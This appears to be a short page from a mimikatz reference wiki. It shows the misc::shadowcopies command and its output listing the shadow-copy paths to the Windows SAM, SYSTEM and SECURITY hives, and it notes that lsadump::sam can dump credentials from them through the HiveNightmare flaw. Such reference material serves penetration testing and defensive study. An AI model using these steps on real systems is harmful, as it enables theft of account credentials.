shadowcopies

misc::shadowcopies is used to list the available shadow copies on the system.

The hivenightmare/serious sam vulnerability was discovered by JonasLyk. According to Will Dormann,Builtin\Users had RX access to the SAM, somewhere between Windows 10 1803 and 1809, hence allowing regular users to operate SAM dumping.

mimikatz # misc::shadowcopies

ShadowCopy Volume : HarddiskVolumeShadowCopy12
| Path            : \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\
| Volume LastWrite: 13/10/2021 10:12:09

* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SYSTEM
  | LastWrite   : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SAM
  | LastWrite   : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SECURITY
  | LastWrite   : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SOFTWARE
  | LastWrite   : 20/10/2021 15:09:00
  
  ...Output Omitted...

The then lsadump::sam can be used by defining the shadow copies paths for /sam and /system.

Last updated